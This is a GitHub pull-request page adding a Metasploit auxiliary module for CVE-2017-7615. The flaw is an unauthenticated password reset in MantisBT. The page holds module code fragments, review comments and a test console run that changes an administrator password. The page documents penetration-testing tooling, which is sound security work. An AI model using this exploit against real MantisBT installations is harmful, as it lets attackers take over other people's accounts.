Add a module for CVE-2017-7615 #8671

Merged
merged 9 commits into from Jul 12, 2017

Conversation


@jvoisin jvoisin commented Jul 9, 2017

Add a module for CVE-2017-7615, aka an unauthenticated password reset in MantisBT.

Verification

List the steps needed to make sure this thing works

  • Setup MantisBT (you can get the version 1.3.0 here or from sourceforge)
  • Start msfconsole
  • use auxiliary/admin/http/mantisbt_password_reset
  • set RHOST <target IP>
  • Verify that the module outputs [+] Password successfully changed to …
  • Verify that the password works
4. Do: ```set rhost```
5. Do: ```run```
6. If the system is vulnerable, the module should tell you that the password
was successfulyl changed.

@bcoles bcoles Jul 9, 2017

"successfully"

['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']

@bcoles bcoles Jul 9, 2017

Inconsistent indentation

],
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => "Apr 16, 2017"))

@bcoles bcoles Jul 9, 2017

I don't think , is allowed in DisclosureDate.

Make sure you run tools/dev/msftidy.rb


@jvoisin jvoisin Jul 9, 2017

It doesn't raise any warnings here.

'vars_post' => {
'verify_user_id' => datastore['USERID'],
'account_update_token' => $1,
'realname' => 'jvoisin',
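Review bot: `'account_update_token' => $1` reads the capture of whatever regex matched most recently in the enclosing method, so any match added between the token regex and this hash (or a failed match, which leaves `$1` nil) silently changes the value sent. Capture the token into a local at the match site (`token = $1` right after the `=~`, or use `res.body.match(...)` and `m[1]`) and reference that variable here.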

@bcoles bcoles Jul 9, 2017

Can the realname be randomized? Rex::Text.rand_text_alpha(rand(5) + 8)


@jvoisin jvoisin Jul 9, 2017

Sure

password = datastore['PASSWORD']
end

res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/

@bcoles bcoles Jul 9, 2017

Is this meant to be an if conditional?


@jvoisin jvoisin Jul 9, 2017

Nope, it's meant to get the token later, with $1.


@bcoles bcoles Jul 9, 2017

Will MantisBT accept the request if the account_update_token is '' ?

If not, it might be nice to handle this scenario, with something like:

if res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
  token = $1
else
  fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')
end


@jvoisin jvoisin Jul 9, 2017

Sure

['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
],
'Platform' => ['win', 'linux'],
'Privileged' => false,

@bcoles bcoles Jul 9, 2017

Privileged can be removed for auxiliary modules.

if datastore['PASSWORD'].blank?
password = Rex::Text.rand_text_alpha(8)
else
password = datastore['PASSWORD']

@bcoles bcoles Jul 9, 2017

Does MantisBT make use of a password complexity policy? It might be nice to print_warning if the specified password is too weak to pass the complexity requirements.


@jvoisin jvoisin Jul 9, 2017

Absolutely not :D


@bcoles bcoles commented Jul 9, 2017

Thanks @jvoisin !

[
['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']

@bcoles bcoles Jul 9, 2017

Missing comma , at end of line.


@pbarry-r7 pbarry-r7 commented Jul 12, 2017

Verified, works as advertised for me (and did, indeed, change my Administrator account's password!):

$ ./msfconsole -q
msf > use auxiliary/admin/http/mantisbt_password_reset
msf auxiliary(mantisbt_password_reset) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(mantisbt_password_reset) > set TARGETURI mantisbt
TARGETURI => mantisbt
msf auxiliary(mantisbt_password_reset) > run

[+] Password successfully changed to 'KEYooXFe'.
[*] Auxiliary module execution completed

I have a few very minor style (and one spelling) tweaks, will commit then land. Thanks, @jvoisin!

@pbarry-r7 pbarry-r7 merged commit 5802196 into rapid7:master Jul 12, 2017
1 check passed

@pbarry-r7 pbarry-r7 commented Jul 12, 2017

Release Notes

The ability to reset the password associated with any user ID for vulnerable versions of MantisBT has been added.
